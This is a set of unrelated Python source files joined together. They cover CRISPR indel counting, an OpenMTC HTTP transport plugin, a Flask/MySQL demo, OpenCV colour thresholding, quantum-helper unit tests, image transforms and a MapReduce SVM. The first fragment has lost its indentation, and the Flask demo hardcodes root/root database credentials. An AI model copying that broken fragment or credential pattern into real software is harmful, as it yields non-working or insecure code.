iNeedle_insertion = 0
iNeedle_deletion = 0
lInsertion_in_read = [] # insertion result [[100, 1], [119, 13]]
lDeletion_in_read = [] # deletion result [[97, 1], [102, 3]]
# print 'sRef_needle', sRef_needle
# print 'sQuery_needle', sQuery_needle
for i, (sRef_nucle, sQuery_nucle) in enumerate(zip(sRef_needle, sQuery_needle)):
if sRef_nucle == '-':
iNeedle_insertion += 1
if sQuery_nucle == '-':
iNeedle_deletion += 1
if sRef_nucle in ['A', 'C', 'G', 'T']:
if iNeedle_insertion:
lInsertion_in_read.append([iNeedle_match_pos_ref, iNeedle_insertion])
iNeedle_insertion = 0
iNeedle_match_pos_ref += 1
if sQuery_nucle in ['A', 'C', 'G', 'T']:
if iNeedle_deletion:
lDeletion_in_read.append([iNeedle_match_pos_query, iNeedle_deletion])
iNeedle_match_pos_query += iNeedle_deletion
iNeedle_deletion = 0
iNeedle_match_pos_query += 1
# print 'sRef_needle', sRef_needle
return (lInsertion_in_read, lDeletion_in_read)
def _TakeInsertionFromAlignment(self, lInsertion_in_read, iKbp_front_Indel_end, lTarget_indel_result,
iIndel_end_from_barcode_pos, iInsert_count):
"""
ins case
...............................NNNNNNNNNNNNNN....NNNNNNNNNNNNNNNNNNN*NNNNNAGCTT
"""
for iMatch_pos, iInsertion_pos in lInsertion_in_read:
if self.strPamType == 'CAS9':
# if i5bp_front_Indel_end == iMatch_pos -1 or iIndel_end_from_barcode_pos == iMatch_pos -1: # iMatch_pos is one base # original ver
if iKbp_front_Indel_end - self.intInsertionWin <= iMatch_pos - 1 <= iKbp_front_Indel_end + self.intInsertionWin: # iMatch_pos is one base
iInsert_count = 1
lTarget_indel_result.append(str(iMatch_pos) + 'M' + str(iInsertion_pos) + 'I')
elif self.strPamType == 'CPF1':
if iKbp_front_Indel_end - self.intInsertionWin <= iMatch_pos - 1 <= iKbp_front_Indel_end + self.intInsertionWin or \
iIndel_end_from_barcode_pos - self.intInsertionWin <= iMatch_pos - 1 <= iIndel_end_from_barcode_pos + self.intInsertionWin: # iMatch_pos is one base
iInsert_count = 1
lTarget_indel_result.append(str(iMatch_pos) + 'M' + str(iInsertion_pos) + 'I')
return iInsert_count
def _TakeDeletionFromAlignment(self, lDeletion_in_read, iKbp_front_Indel_end, lTarget_indel_result,
iIndel_end_from_barcode_pos, iDelete_count):
"""
del case 1
...............................NNNNNNNNNNNNNN....NNNNNNNNNNNNNNNNNNNNN**NNNAGCTT
del case 2
...............................NNNNNNNNNNNNNN....NNNNNNNNNNNNNNNNNNNNN**NNNNNCTT
"""
for iMatch_pos, iDeletion_pos in lDeletion_in_read:
"""
Insertion: 30M3I
^
ACGT---ACGT
ACGTTTTACGT -> check this seq
Insertion just check two position
Deletion: 30M3D
^
ACGTTTTACGT
ACGT---ACGT -> check this seq
But deletion has to includes overlap deletion.
"""
if self.strPamType == 'CAS9':
if (iMatch_pos - self.intDeletionWin - 1 <= iKbp_front_Indel_end and iKbp_front_Indel_end < (iMatch_pos + iDeletion_pos + self.intDeletionWin - 1)):
iDelete_count = 1
lTarget_indel_result.append(str(iMatch_pos) + 'M' + str(iDeletion_pos) + 'D')
elif self.strPamType == 'CPF1':
if (iMatch_pos - self.intDeletionWin - 1 <= iKbp_front_Indel_end and iKbp_front_Indel_end < (iMatch_pos + iDeletion_pos + self.intDeletionWin - 1)) or \
(iMatch_pos - self.intDeletionWin - 1 <= iIndel_end_from_barcode_pos and iIndel_end_from_barcode_pos < (iMatch_pos + iDeletion_pos + self.intDeletionWin - 1)):
iDelete_count = 1
lTarget_indel_result.append(str(iMatch_pos) + 'M' + str(iDeletion_pos) + 'D')
return iDelete_count
def _MakeAndStoreQuality(self, sName, sSeq, lQual, dResult, sBarcode):
listResultFASTQ = [sName, sSeq, '+', ''.join(chr(i + 33) for i in lQual)]
dResult[sBarcode][self.intTotalFastq].append(listResultFASTQ)
return listResultFASTQ
def _FixPos(self, lTarget_indel_result, iTarget_start_from_barcode):
lTrimmed_target_indel_result = []
for sINDEL in lTarget_indel_result:
# B - A is not included B position, so +1
iMatch_target_start = int(sINDEL.split('M')[0]) - iTarget_start_from_barcode
""" This part determines a deletion range.
^ current match pos
AGCTACGATCAGCATCTGACTTACTTC[barcode]
^ fix the match start at here. (target region)
AGCTACGATCAGCATC TGACTTACTTC[barcode]
if iMatch_target_start < 0:
sContinue = 1
But, this method has some problems.
^ barcode start
AGCTACGATCAGCAT*********C[barcode]
Like this pattern doesn't seleted. because, deletion checking is begun the target region start position.
Thus, I have fixed this problem.
"""
if iMatch_target_start <= -(iTarget_start_from_barcode):
# print(iMatch_target_start, iTarget_start_from_barcode)
continue
lTrimmed_target_indel_result.append(str(iMatch_target_start) + 'M' + sINDEL.split('M')[1])
# filter end
return lTrimmed_target_indel_result
def _StoreToDictResult(self, sRef_seq_after_barcode, sQuery_seq_after_barcode, iTarget_start_from_barcode,
dResult, sBarcode, lTrimmed_target_indel_result, sTarget_region, sRef_needle_ori, sQuery_needle_ori,
iInsert_count, iDelete_count, iComplex_count, listResultFASTQ):
sRef_seq_after_barcode = sRef_seq_after_barcode[iTarget_start_from_barcode:]
sQuery_seq_after_barcode = sQuery_seq_after_barcode[iTarget_start_from_barcode:]
dResult[sBarcode][self.intIndelInfo].append([sRef_seq_after_barcode, sQuery_seq_after_barcode, lTrimmed_target_indel_result,
sTarget_region, sRef_needle_ori, sQuery_needle_ori])
if iInsert_count:
dResult[sBarcode][self.intInsFastq].append(listResultFASTQ)
elif iDelete_count:
dResult[sBarcode][self.intDelFastq].append(listResultFASTQ)
elif iComplex_count:
dResult[sBarcode][self.intComFastq].append(listResultFASTQ)
return (sRef_seq_after_barcode, sQuery_seq_after_barcode)
def CalculateIndelFrequency(self, dResult):
    """Aggregate per-barcode indel frequencies.

    dResult[barcode][self.intIndelInfo] holds records of
    [ref_seq, query_seq, indel_list, target_region, ref_needle, query_needle].
    Returns {barcode: [[ref_seq, query_seqs, indel, frequency,
    target_region, ref_needles, query_needles], ...]}.
    """
    dResult_INDEL_freq = {}
    for sBarcode, lValue in dResult.items():  # lValue[gINDEL_info] : [[sRef_seq_after_barcode, sQuery_seq_after_barcode, lTarget_indel_result, sTarget_region], ..])
        sRef_seq_loop = ''
        llINDEL_store = []  # ['ACAGACAGA', ['20M2I', '23M3D']]
        dINDEL_freq = {}
        if lValue[self.intIndelInfo]:
            # Flatten: one llINDEL_store entry per individual indel descriptor.
            for sRef_seq_loop, sQuery_seq, lINDEL, sTarget_region, sRef_needle, sQuery_needle in lValue[self.intIndelInfo]:  # llINDEL : [['20M2I', '23M3D'], ...]
                # print 'lINDEL', lINDEL
                for sINDEL in lINDEL:
                    llINDEL_store.append([sQuery_seq, sINDEL, sRef_needle, sQuery_needle])
            iTotal = len([lINDEL for sQuery_seq, lINDEL, sRef_needle, sQuery_needle in llINDEL_store])
            # First pass initializes an empty bucket per distinct indel,
            # second pass fills counts and supporting reads/needles.
            for sQuery_seq, sINDEL, sRef_needle, sQuery_needle in llINDEL_store:
                dINDEL_freq[sINDEL] = [[], 0, [], []]
            for sQuery_seq, sINDEL, sRef_needle, sQuery_needle in llINDEL_store:
                dINDEL_freq[sINDEL][1] += 1
                dINDEL_freq[sINDEL][0].append(sQuery_seq)
                dINDEL_freq[sINDEL][2].append(sRef_needle)
                dINDEL_freq[sINDEL][3].append(sQuery_needle)
            # NOTE(review): sRef_seq_loop and sTarget_region below rely on
            # the loop variables leaking out of the for-loop above, i.e.
            # they carry the values from the LAST indel-info record of this
            # barcode -- confirm this is intended.
            for sINDEL in dINDEL_freq:
                lQuery = dINDEL_freq[sINDEL][0]
                iFreq = dINDEL_freq[sINDEL][1]
                lRef_needle = dINDEL_freq[sINDEL][2]
                lQuery_needle = dINDEL_freq[sINDEL][3]
                try:
                    dResult_INDEL_freq[sBarcode].append([sRef_seq_loop, lQuery, sINDEL, float(iFreq) / iTotal,
                                                         sTarget_region, lRef_needle, lQuery_needle])
                except (KeyError, TypeError, AttributeError) as e:
                    # KeyError on the first indel of a barcode: create the list.
                    dResult_INDEL_freq[sBarcode] = []
                    dResult_INDEL_freq[sBarcode].append([sRef_seq_loop, lQuery, sINDEL, float(iFreq) / iTotal,
                                                         sTarget_region, lRef_needle, lQuery_needle])
        # end: if lValue[gINDEL_info]
    # end: for sBarcode, lValue
    return dResult_INDEL_freq
    # end1: return
    # end: def
#END:class
class clsOutputMaker(object):
    """Writes analysis results as a pickle under <outdir>/Tmp/Pickle."""

    def __init__(self, InstParameter):
        self.strOutputdir = InstParameter.strOutputdir
        self.strForwardFqPath = InstParameter.strForwardFqPath

    def MakePickleOutput(self, dictResult, dictResultIndelFreq, strBarcodePamPos=''):
        """Bundle the result dictionaries and dump them to
        <outdir>/Tmp/Pickle/<forward-fastq-basename>.pickle."""
        dictOutput = {'dictResult': dictResult,
                      'dictResultIndelFreq': dictResultIndelFreq,
                      'strBarcodePamPos': strBarcodePamPos}
        strPicklePath = '{outdir}/Tmp/Pickle/{fq}.pickle'.format(
            outdir=self.strOutputdir,
            fq=os.path.basename(self.strForwardFqPath))
        with open(strPicklePath, 'wb') as Pickle:
            pickle.dump(dictOutput, Pickle)
def Main():
    """Entry point: parse parameters, scan FASTQ reads for indels around
    the barcode/PAM site, and pickle the per-barcode results."""
    InstParameter = clsParameter()
    # Log to the configured file and mirror everything to stdout.
    logging.basicConfig(format='%(process)d %(levelname)s %(asctime)s : %(message)s',
                        level=logging.DEBUG,
                        filename=InstParameter.strLogPath,
                        filemode='a')
    logging.getLogger().addHandler(logging.StreamHandler(sys.stdout))
    logging.info('Program start : %s' % InstParameter.strForwardFqPath)
    logging.info('File Open')
    InstFileOpen = clsFastqOpener(InstParameter)
    listFastqForward = InstFileOpen.OpenFastqForward()
    # Reverse reads are only loaded for paired-end runs.
    if InstParameter.strPair == 'True':
        listFastqReverse = InstFileOpen.OpenFastqReverse()
    InstIndelSearch = clsIndelSearchParser(InstParameter)
    InstOutput = clsOutputMaker(InstParameter)
    if InstParameter.strPamType == 'CPF1':
        logging.info('Search barcode INDEL pos')
        dRef, dResult = InstIndelSearch.SearchBarcodeIndelPosition(InstParameter.strBarcodePamPos)  # ref check.
        logging.info('Search INDEL forward')
        dResultForward = InstIndelSearch.SearchIndel(listFastqForward, dRef, dResult)
        if InstParameter.strPair == 'True':
            # Paired-end: the forward results are fed into the reverse pass
            # so counts accumulate over both reads.
            logging.info('Search INDEL reverse')
            dResultReverse = InstIndelSearch.SearchIndel(listFastqReverse, dRef, dResultForward)
            logging.info('Calculate INDEL frequency')
            dictResultIndelFreq = InstIndelSearch.CalculateIndelFrequency(dResultReverse)
            logging.info('Make pickle output forward')
            InstOutput.MakePickleOutput(dResultReverse, dictResultIndelFreq)
        else:
            logging.info('Calculate INDEL frequency')
            dictResultIndelFreq = InstIndelSearch.CalculateIndelFrequency(dResultForward)
            logging.info('Make pickle output forward')
            InstOutput.MakePickleOutput(dResultForward, dictResultIndelFreq)
    elif InstParameter.strPamType == 'CAS9':
        logging.info('Search barcode INDEL pos')
        dRef, dResult = InstIndelSearch.SearchBarcodeIndelPosition(InstParameter.strBarcodePamPos)
        logging.info('Search INDEL')
        # CAS9 passes the barcode/PAM position through to SearchIndel.
        dResult_forward = InstIndelSearch.SearchIndel(listFastqForward, dRef, dResult, InstParameter.strBarcodePamPos)
        logging.info('Calculate INDEL frequency')
        dResult_INDEL_freq = InstIndelSearch.CalculateIndelFrequency(dResult_forward)
        logging.info('Make pickle output forward')
        InstOutput.MakePickleOutput(dResult_forward, dResult_INDEL_freq, InstParameter.strBarcodePamPos)
    logging.info('Program end : %s' % InstParameter.strForwardFqPath)
    #END:def
# Script entry point.
if __name__ == '__main__':
    Main()
|
from . import api, nav, data, stream
|
from gevent.pywsgi import Input
from gevent.wsgi import WSGIServer
from urlparse import urlparse
from netifaces import ifaddresses, interfaces
from socket import getnameinfo, gaierror, getservbyname, AF_INET, AF_INET6
from time import time
from socket import error as SocketError
from funcy import pluck
from geventhttpclient.client import HTTPClient
from openmtc_server.Plugin import Plugin
from .wsgi import OpenMTCWSGIApplication
from openmtc_server.platform.gevent.ServerRack import GEventServerRack
from aplus import Promise
from openmtc_server.exc import ConfigurationError
from openmtc_server.transportdomain import (Response, ErrorResponse,
RequestMethod, Connector)
from futile.caching import LRUCache
from openmtc.exc import OpenMTCNetworkError, ConnectionFailed
from openmtc_server.configuration import (Configuration, ListOption,
SimpleOption, BooleanOption)
class ConnectorConfiguration(Configuration):
    # Declarative schema for a single HTTP connector endpoint.
    __name__ = "Connector configuration"
    __options__ = {"interface": SimpleOption(default=""),  # bind address; "" binds all interfaces
                   "host": SimpleOption(default=None),     # advertised host; guessed in _start when None
                   "port": SimpleOption(int),
                   "is_wan": BooleanOption(default=None)}  # None = unknown (rejected in _start)
class HTTPTransportPluginGatewayConfiguration(Configuration):
    # Gateway defaults: LAN connector on 5000, WAN connector on 4000.
    __name__ = "HTTPTransportPluginGatewayConfiguration configuration"
    __options__ = {
        "connectors": ListOption(ConnectorConfiguration,
                                 default=(
                                     ConnectorConfiguration(port=5000,
                                                            is_wan=False),
                                     ConnectorConfiguration(port=4000,
                                                            is_wan=True)))
    }
class HTTPTransportPluginBackendConfiguration(Configuration):
    # Backend defaults: LAN connector on 15000, WAN connector on 14000.
    __name__ = "HTTPTransportPluginBackendConfiguration configuration"
    __options__ = {
        "connectors": ListOption(ConnectorConfiguration,
                                 default=(
                                     ConnectorConfiguration(port=15000,
                                                            is_wan=False),
                                     ConnectorConfiguration(port=14000,
                                                            is_wan=True)))
    }
class HTTPTransportPlugin(Plugin):
    """HTTP(S) transport for OpenMTC.

    Outbound: send_request() issues requests via pooled geventhttpclient
    clients and resolves/rejects an aplus Promise.
    Inbound: _start() spins up one gevent WSGI server per configured
    connector and registers the connectors with the platform API.
    """

    # Read at most this many bytes of an error body into error messages.
    ERROR_RESPONSE_MAX = 320

    __gateway_configuration__ = HTTPTransportPluginGatewayConfiguration
    __backend_configuration__ = HTTPTransportPluginBackendConfiguration

    def _init(self):
        # TODO: make max_items configurable
        self._clients = LRUCache(threadsafe=False)
        self.api.register_client(("http", "https"), self.send_request)
        self._initialized()

    # Abstract request method -> HTTP verb.
    __methodmap = {
        RequestMethod.create: "POST",
        RequestMethod.delete: "DELETE",
        RequestMethod.update: "PUT",
        RequestMethod.retrieve: "GET"
    }

    def _get_error_message(self, response, content_type=None):
        """Return a bounded, printable excerpt of an error response body."""
        try:
            data = response.read(self.ERROR_RESPONSE_MAX and
                                 self.ERROR_RESPONSE_MAX + 1 or
                                 None)
            if not data:
                data = "<no further information available>"
            elif (self.ERROR_RESPONSE_MAX and
                    len(data) > self.ERROR_RESPONSE_MAX):
                data = data[:self.ERROR_RESPONSE_MAX] + " (truncated)\n"
            data = data.encode("utf-8")
        except Exception as e:
            data = "<failed to read error response: %s>\n" % (e, )
        # BUGFIX: was `content_type is 'text/plain'`; identity comparison
        # against a string literal is never reliably true for a header
        # value -- use equality.
        if not data.endswith("\n") and content_type == 'text/plain':
            data += "\n"
        return data

    def _get_client(self, parsed_url):
        """Return (and cache) the HTTP client for the URL's (host, port, tls)."""
        https = parsed_url.scheme[-1].lower() == "s"
        port = parsed_url.port or (https and 443 or 80)
        host = parsed_url.hostname
        key = (host, port, https)
        try:
            return self._clients[key]
        except KeyError:
            # TODO: make connection_timeout and concurrency configurable
            client = self._clients[key] = HTTPClient(host, port,
                                                     connection_timeout=120.0,
                                                     concurrency=50,
                                                     ssl=https)
            return client

    def _handle_network_error(self, exc, p, method, parsed, path, t,
                              exc_class=OpenMTCNetworkError):
        """Reject promise *p* with exc_class carrying a descriptive message."""
        error_str = str(exc)
        if error_str in ("", "''"):
            error_str = repr(exc)
        logpath = "%s://%s%s" % (parsed.scheme, parsed.netloc, path)
        error_msg = "Error during HTTP request: %s. " \
                    "Request was: %s %s (%.4fs)" % (error_str, method,
                                                    logpath, time() - t)
        p.reject(exc_class(error_msg))

    def send_request(self, request):
        """Send *request* over HTTP(S).

        Returns a Promise fulfilled with a Response on 2xx, rejected with
        ErrorResponse on >= 400, and rejected with OpenMTCNetworkError /
        ConnectionFailed on transport problems.
        """
        with Promise() as p:
            # TODO: caching of clients and answers
            # TODO: set accept
            # TODO: set auth
            # TODO: other headers?
            # TODO: params
            fullpath = request.path
            parsed = urlparse(fullpath)
            client = self._get_client(parsed)
            method = self.__methodmap[request.method]
            payload = request.payload
            if payload:
                headers = {"Content-Type": request.content_type}
                # TODO: do we need to set Content-Length?
            else:
                headers = {}
            t = time()
            if request.originator:
                headers["From"] = request.originator
            if request.metadata:
                for k, v in request.metadata.items():
                    headers[k] = v
            path = parsed.path
            self.logger.debug("Request params: %s", request.params)
            if request.params:
                path += "?"
                param_str = [k + "=" + str(v) for
                             k, v in request.params.items()]
                path += "&".join(param_str)
            self.logger.debug("%s %s (%s)\n%r", method, path, headers,
                              request.payload)
            try:
                # FIXME: rst: geventhttpclient host header is not ipv6 safe
                # it is missing the brackets around the IP
                # our notification server is ignoring it but other servers could
                # handle this as an error and it is not correct wrt the standard
                headers['Host'] = parsed.netloc
                payload = request.payload
                # this was a try/catch block before, but broke the code
                # TODO: if openmtc can have streams here, too, those also have
                # TODO: to be dealt with
                if type(payload) is Input:
                    payload = payload.read()
                response = client.request(method, path, payload, headers)
            except (SocketError, gaierror) as exc:
                self._handle_network_error(exc, p, method, parsed, path, t,
                                           ConnectionFailed)
            except Exception as exc:
                self.logger.exception("Error in HTTP request")
                self._handle_network_error(exc, p, method, parsed, path, t)
            else:
                try:
                    status_code = response.get_code()
                    content_type = response.get("Content-Type")
                    self.logger.debug("%s %s result: %s (%.4fs)", method,
                                      fullpath, status_code, time() - t)
                    self.logger.debug("Response headers: %s", response.items())
                    if status_code >= 400:
                        data = self._get_error_message(response, content_type)
                        # BUGFIX: was `content_type is 'text/plain'` -- the
                        # identity test against a literal made this branch
                        # effectively unreachable; use equality.
                        if content_type == 'text/plain':
                            msg = "Error during execution: %s - %s" \
                                  "Request was: %s %s." % (status_code, data,
                                                           method, request.path)
                            p.reject(ErrorResponse(status_code, msg,
                                                   "text/plain"))
                        else:
                            p.reject(ErrorResponse(
                                status_code, data, content_type,
                                metadata=dict(response.headers)))
                    elif status_code < 200 or status_code >= 300:
                        raise OpenMTCNetworkError(status_code)
                    else:
                        p.fulfill(Response(status_code, response.read() or None,
                                           content_type, location=response.get(
                                               "Location") or response.get(
                                               "Content-Location"),
                                           metadata=dict(response.headers)))
                finally:
                    response.release()
        return p

    def _find_address(self, address, family):
        """Pick a non-loopback address of *family* from any interface,
        falling back to loopback if that is all there is."""
        localhost = None
        for interface in interfaces():
            try:
                ifdata = ifaddresses(interface)[family]
                addresses = pluck("addr", ifdata)
            except KeyError:
                pass
            else:
                if addresses:
                    for a in addresses:
                        if a not in ("::1", "127.0.0.1"):
                            # Strip any IPv6 zone index ("%eth0").
                            return a.rsplit("%", 1)[0]
                        if a:
                            localhost = a
        if localhost:
            return localhost
        # BUGFIX: the address was passed as a second Exception argument
        # instead of being interpolated into the message.
        raise Exception("Failed to guess host for interface '%s'" % (address, ))

    def _find_addresses(self, family):
        """All addresses of *family* on all interfaces (zone index stripped)."""
        addresses = []
        for interface in interfaces():
            try:
                ifdata = ifaddresses(interface)[family]
                addresses += pluck("addr", ifdata)
            except KeyError:
                pass
        return [a.rsplit("%", 1)[0] for a in addresses]

    def _guess_host(self, address):
        """Derive a usable host string from a bind address; wildcard binds
        are resolved to a concrete interface address."""
        if address not in ("::", "", "0.0.0.0"):
            if ":" in address:
                # Literal IPv6 addresses need brackets inside URLs.
                return "[" + address + "]"
            return address
        family = address == "::" and AF_INET6 or AF_INET
        host = self._find_address(address, family)
        if family == AF_INET6:
            return "[" + host + "]"
        return host

    def _guess_alternatives(self, address):
        """List alternative host strings (addresses plus reverse-DNS names)
        a wildcard-bound server is reachable under; None for a fixed bind."""
        if address not in ("::", "", "0.0.0.0"):
            return None
        hosts = self._find_addresses(AF_INET)
        for a in hosts[:]:
            self.logger.debug("Finding hostname for %s", a)
            try:
                host = getnameinfo((a, 0), 0)[0]
            except Exception as e:
                self.logger.warn("Failed to lookup name for address %s: %s",
                                 address, e)
            else:
                if host != a:
                    hosts.append(host)
        if address == "::":
            hosts.append("[::]")
            ipv6addresses = self._find_addresses(AF_INET6)
            for address in ipv6addresses:
                hosts.append("[" + address.split("%")[0] + "]")
                self.logger.debug("Finding hostname for %s", address)
                try:
                    host = getnameinfo((address, 0), 0)[0]
                except Exception as e:
                    self.logger.warn("Failed to lookup address %s: %s",
                                     address, e)
                else:
                    if host != address:
                        hosts.append(host)
        else:
            hosts.append("0.0.0.0")
        return hosts

    def _start(self):
        """Create and start one WSGI server per configured connector and
        register the connectors with the platform."""
        servers = []
        additional_hostnames = self.config["global"].get(
            "additional_hostnames", [])
        if not isinstance(additional_hostnames, list):
            raise ConfigurationError("additional_hostnames is not a list")
        require_auth = self.config["global"].get("require_auth", True)
        for endpoint in self.config.get("connectors", []):
            interface = endpoint["interface"]
            port = endpoint["port"]
            host = endpoint["host"]
            keyfile = endpoint.get("key")
            certfile = endpoint.get("crt")
            if not host:
                host = self._guess_host(interface)
                self.logger.info("No host specified for connector on '%s'. "
                                 "Guessing %s", interface, host)
                connectors = self._guess_alternatives(interface)
            else:
                connectors = []
            is_https = keyfile and certfile
            scheme = "https" if is_https else "http"
            base_uri = "%s://%s:%s" % (scheme, host, port)
            # BUGFIX: this comprehension previously used `host` as its loop
            # variable; under Python 2 comprehension variables leak into
            # the enclosing scope, so the outer `host` used below was
            # clobbered by the last alternative. A private name fixes it.
            connectors = ["%s://%s:%s" % (scheme, h, port)
                          for h in connectors]
            default_port = getservbyname(scheme)
            if port == default_port:
                connectors.append("%s://%s" % (scheme, host))
            for hostname in additional_hostnames:
                alternative = "%s://%s" % (scheme, hostname)
                parsed_alternative = urlparse(alternative)
                alternative_port = parsed_alternative.port
                if alternative_port in (None, ''):
                    # No explicit port on the hostname: use the connector's.
                    alternative_port = port
                    alternative = "%s:%s" % (alternative, port)
                connectors.append(alternative)
                if alternative_port == default_port:
                    connectors.append("%s://%s" %
                                      (scheme,
                                       parsed_alternative.hostname))
            if endpoint.is_wan is None:
                # TODO: guess if an interface is a WAN interface
                raise NotImplementedError()
            connector = Connector(base_uri, connectors, endpoint.is_wan)
            application = OpenMTCWSGIApplication(self.api.handle_request,
                                                 connector=connector,
                                                 server_address=interface,
                                                 require_auth=require_auth)
            if is_https:
                servers.append(WSGIServer(
                    (interface, port), application,
                    environ={'SERVER_NAME': 'openmtc.local'},
                    keyfile=keyfile, certfile=certfile))
            else:
                servers.append(WSGIServer(
                    (interface, port), application,
                    environ={'SERVER_NAME': 'openmtc.local'}))
            self.api.register_connector(connector)
        rack = self.__rack = GEventServerRack(servers)
        rack.start()
        self._started()

    def _stop(self):
        """Stop all WSGI servers started by _start()."""
        self.__rack.stop()
        self._stopped()
|
# Simple Python application that reads from a MySQL database
from flask import Flask
from typing import List, Dict
import json
import mysql.connector
# Flask application instance served by this module.
app = Flask(__name__)
def cores() -> List[Dict]:
    """Read all rows from the `cores` table and return them as a list of
    single-entry {nome: cor} dicts.

    Connection parameters are fixed for the compose setup (host `db`,
    database `frutas`).
    """
    config = {
        'user': 'root',
        'password': 'root',
        'host': 'db',
        'port': '3306',
        'database': 'frutas'
    }
    con = mysql.connector.connect(**config)
    try:
        cursor = con.cursor()
        try:
            cursor.execute('SELECT * FROM cores')
            return [{nome: cor} for (nome, cor) in cursor]
        finally:
            # BUGFIX: the cursor and connection leaked when the query
            # raised; close them unconditionally.
            cursor.close()
    finally:
        con.close()
@app.route('/')
def index() -> str:
    """Serve the full colour table as a JSON document."""
    payload = {'cores': cores()}
    return json.dumps(payload)
# Development entry point; bind all interfaces so the container is reachable.
if __name__ == '__main__':
    app.run(host='0.0.0.0')
|
from color_detection.histogram import hsv
import cv2 as cv
import numpy as np
class Threshold(hsv):
    """Colour thresholding built on the project's `hsv` histogram class.

    Keeps both the BGR frame and its HSV conversion and produces binary
    masks from the hue/sat/val ranges maintained by the base class.
    """

    def __init__(self):
        hsv.__init__(self)

    def assign(self, img):
        # Store the BGR frame and its HSV conversion, then hand the HSV
        # image to the base class' private __assign (name-mangled form).
        self.img = img
        self.img_hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)
        self._hsv__assign(self.img_hsv)

    def read_mask(self):
        # Binary mask of pixels inside the current [low, high] HSV ranges.
        return cv.inRange(self.img_hsv,
                          np.array([self.hue.range[0],
                                    self.sat.range[0],
                                    self.val.range[0]]),
                          np.array([self.hue.range[1],
                                    self.sat.range[1],
                                    self.val.range[1]]))

    def read(self):
        # Original image with everything outside the mask removed.
        return cv.bitwise_or(self.img, self.img, mask=self.read_mask())

    def update(self, filter):
        # NOTE(review): `filter` shadows the builtin; the name is kept in
        # case callers pass it by keyword.
        if self.__filter(filter):
            # Hue located: refine saturation and value from the filtered image.
            self.sat.value, self.sat.range, _ = \
                self.find_sat()
            self.val.value, self.val.range, _ = \
                self.find_val()
        else:
            # No hue found: zero out saturation/value state.
            self.sat.value = 0
            self.sat.range = np.zeros(2)
            self.val.value = 0
            self.val.range = np.zeros(2)

    def __filter(self, filter):
        # presumably find_hue returns (value, range, retval) with retval == -1
        # meaning "hue located" -- TODO confirm against the hsv base class.
        if self.hue.color != "red":
            # Filter hue from histogram
            self.hue.value, self.hue.range, retval = \
                self.find_hue(filter)
            if retval == -1:
                # Masking
                # Restrict the HSV image to the detected hue band before
                # re-assigning it to the base class.
                mask = cv.inRange(
                    self.img_hsv,
                    np.array([self.hue.range[0],
                              self.sat.find_range[0],
                              self.val.find_range[0]]),
                    np.array([self.hue.range[1],
                              self.sat.find_range[1],
                              self.val.find_range[1]]))
                self.img_hsv_filtered = cv.bitwise_and(
                    self.img_hsv, self.img_hsv, mask=mask
                )
                self._hsv__assign(self.img_hsv_filtered)
        # NOTE(review): when hue.color == "red", `retval` is never assigned
        # and this return raises NameError -- confirm red is handled
        # elsewhere before relying on this path.
        return retval == -1
|
import QuantumSystem as qs
import unittest
class TestClasicoCuamtico(unittest.TestCase):
    """Unit tests for the QuantumSystem helpers (class name kept as-is,
    including its spelling, so external references still resolve)."""

    def test_transational_amplitude(self):
        # Transition amplitude between two 2-component kets, each entry
        # given as a (real, imag) tuple.
        result = qs.Transitional_amplitude([[((2**0.5/2),0),(0,(2**0.5/2))]],[[(0,(2**0.5/2)),(-(2**0.5/2),0)]])
        self.assertEqual(result,(0.0, -1.0))

    def test_specific_position(self):
        # Probability of observing the system at position index 2 of the
        # given state vector.
        result = qs.probability_specific_position([(-3,-1),(0,-2),(0,1),(2,0)],2)
        self.assertEqual(result,0.052632)
# Run the test suite when executed directly.
if __name__ == '__main__':
    unittest.main()
|
"""
Module with definitions for image transformations such as rotations and dilations
"""
import cv2
import numpy as np
def resize_to_target(img, width, height):
    """
    Return *img* resized to exactly (width, height) pixels.
    """
    target_dimensions = (width, height)
    return cv2.resize(img, target_dimensions)
def rotate_image(image, angle):
    """
    Return *image* rotated counterclockwise by *angle* degrees.

    The rotation matrix is built around the image center and applied with
    bilinear interpolation; the output keeps the original dimensions.
    """
    width_height = image.shape[1::-1]
    center = tuple(np.array(width_height) / 2)
    rotation_matrix = cv2.getRotationMatrix2D((center[0], center[1]), angle, 1.0)
    rotated = cv2.warpAffine(image, rotation_matrix, width_height,
                             flags=cv2.INTER_LINEAR)
    return rotated
|
"""
Linear SVM with MapReduce
Algorithm builds a model with continuous features and predicts binary target label (-1, 1).
Reference
Algorithm is proposed by Glenn Fung, O. L. Mangasarian. Incremental Support Vector Machine Classification. Description of algorithm can be found at ftp://ftp.cs.wisc.edu/pub/dmi/tech-reports/01-08.pdf.
"""
def simple_init(interface, params):
    """Identity initializer: hand the params object straight back to the worker."""
    return params
def map_fit(interface, state, label, inp):
    """
    Map phase of the fit: accumulate the E^T*E matrix and E^T*D*e vector
    over the input samples, then emit them ("etde" plus one output record
    per E^T*E row).
    """
    import numpy as np
    out = interface.output(0)
    mat_ete, vec_etde = 0, 0
    for line in inp:
        fields = line.strip().split(state["delimiter"])  # split row
        if len(fields) <= 1:  # skip empty rows
            continue
        # Feature vector with the -1 intercept term appended; values listed
        # as missing are mapped to 0.
        x = np.array(
            [0 if val in state["missing_vals"] else float(val)
             for idx, val in enumerate(fields) if idx in state["X_indices"]]
            + [-1])
        # Map the label onto +1/-1; anything unmapped marks an error.
        raw_label = fields[state["y_index"]]
        if state["y_map"][0] == raw_label:
            y = 1
        elif state["y_map"][1] == raw_label:
            y = -1
        else:
            y = "Error"
        mat_ete += np.outer(x, x)
        vec_etde += x * y
    out.add("etde", vec_etde)
    for row_index, row in enumerate(mat_ete):
        out.add(row_index, row)
def reduce_fit(interface, state, label, inp):
    """
    Reduce phase of the fit: sum the partial E^T*E matrices and E^T*D*e
    vectors from all mappers, add the 1/nu regularization term, and emit
    the final model parameters under the key "params".
    """
    import numpy as np
    out = interface.output(0)
    sum_etde = 0
    sum_ete = [0 for _ in range(len(state["X_indices"]) + 1)]
    for key, value in inp:
        if key == "etde":
            sum_etde += value
        else:
            sum_ete[key] += value
    # BUGFIX: `sum_ete += np.eye(...)/nu` on a *list* extends the list with
    # the identity's rows (list.__iadd__ == extend) instead of adding the
    # regularization term, which breaks the subsequent solve. Convert to an
    # array first and add elementwise.
    sum_ete = np.array(sum_ete) + np.true_divide(np.eye(len(sum_ete)), state["nu"])
    # rcond=None selects the modern lstsq cutoff and silences the
    # FutureWarning emitted by the legacy default.
    out.add("params", np.linalg.lstsq(sum_ete, sum_etde, rcond=None)[0])
def map_predict(interface, state, label, inp):
    """Map phase of prediction: score each sample with the fitted
